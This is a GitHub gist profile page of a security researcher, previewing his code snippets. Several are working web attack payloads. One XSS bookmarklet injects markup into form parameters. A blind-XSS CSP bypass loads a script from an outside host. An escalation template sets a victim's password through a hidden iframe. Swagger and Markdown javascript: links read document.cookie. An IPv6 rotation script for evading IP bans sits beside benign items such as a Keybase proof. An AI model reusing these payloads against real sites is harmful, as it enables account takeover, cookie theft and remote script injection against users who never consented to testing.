Skip to content

Instantly share code, notes, and snippets.

View Rhynorater's full-sized avatar

Justin Gardner Rhynorater

703 followers · 17 following
View GitHub Profile
@Rhynorater
Rhynorater / XSSbookmarklet.js
Last active May 18, 2020 04:23
XSS Discovery Bookmarklet
javascript:(function()%7Bvar j %3D document.getElementsByTagName("input")%3Bif (document.location.href.indexOf("%3F")>-1)%7Bvar l %3D "%26"%3B%7Delse%7Bvar l %3D "%3F"%3B%7Dfor (i%3D0%3Bi<j.length%3Bi%2B%2B)%7Bl%2B%3Dj%5Bi%5D.getAttribute("name")%2B'%3D"><test1234>%26'%7Ddocument.location %3D document.location%2Bl%7D)()
@Rhynorater
Rhynorater / gist:2a7d84fe202d65d71ef557bb3481a520
Created December 18, 2017 00:09
keybase.md
### Keybase proof
I hereby claim:
* I am rhynorater on github.
* I am rhynorater (https://keybase.io/rhynorater) on keybase.
* I have a public key whose fingerprint is AA8E 85A7 69EC F8A7 0FE8 5CF2 AF19 CF4E BEEC A770
To claim this, I am signing this object:
@Rhynorater
Rhynorater / bookmarklet.js
Created March 27, 2018 01:19
OSCP Video Playback Speed Increase
javascript:document.getElementById("video").defaultPlaybackRate = prompt("Enter your prefered playback rate:");document.getElementById("video").load();
@Rhynorater
Rhynorater / gist:311cf3981fda8303d65c27316e69209f
Last active January 3, 2024 07:00
BXSS - CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
@Rhynorater
Rhynorater / getValidDNS.sh
Created September 9, 2018 22:32
A little bash script to gather valid AND fast DNS Resolvers from public-dns.info
if [ "$#" -eq 0 ] || [ "$#" -gt 2 ] || [[ $* == *--help* ]] || [[ $* == *-h* ]]; then
echo "Usage ./getValidDNS.sh [output file] [optional: timeout (seconds)]"
exit 1
fi
@Rhynorater
Rhynorater / exploit.php
Created January 17, 2019 15:05
Basic XSS Escalation Template
<?php
header("Content-Type: application/javascript");
?>
frame=document.createElement("iframe")
frame.addEventListener("load", function() {
setTimeout(function(){
//Once the iframe loads, give it 1 second to load the DOM
frame.contentDocument.getElementById("NewPassword").value="1337H4x0rz!!!"
//Set new password
frame.contentDocument.getElementById("ConfirmNewPassword").value="1337H4x0rz!!!"
@Rhynorater
Rhynorater / gist:3edacd885c61c55dea5b167cba07322d
Last active January 22, 2019 20:48
test
{
"swagger": "2.0",
"info": {
"title": "Swagger Sample App",
"description": "Please to click Terms of service",
"termsOfService": "javascript:alert(document.cookie)"
},
"contact":{
"name": "API Support",
"url": "javascript:alert(document.cookie)",
@Rhynorater
Rhynorater / gist:5c467a23a3fbea5c6b2d1529fa0b0bde
Last active May 25, 2019 02:57
payload
[Click Me](javascript:alert`document.domain`)
@Rhynorater
Rhynorater / checkms.sh
Created July 1, 2019 18:22
Bash script to check if a certain domain is user O365
#!/bin/bash
# Usage checkms.sh
# domains.txt: file with domains on each line to check
# Output: domains that use O365
# -----
# Usage2 checkms.sh domain.com
# Output: domain if uses 0365, nothing if not
if [ "$#" -eq 1 ]; then
x=$(curl -s -k "https://login.microsoftonline.com/getuserrealm.srf?login=username@$1&xml=1" | egrep "Federated|Managed")
if [[ ! -z $x ]]; then
@Rhynorater
Rhynorater / ipv6rotate.py
Created September 9, 2019 20:03
Quickly rotating IPs to avoid ip ban using /64 ipv6 block.
import requests
from httplib import HTTPConnection
import socket
import subprocess
class MyHTTPConnection(HTTPConnection):
def connect(self):
self.sock = s
if self._tunnel_host:
self._tunnel()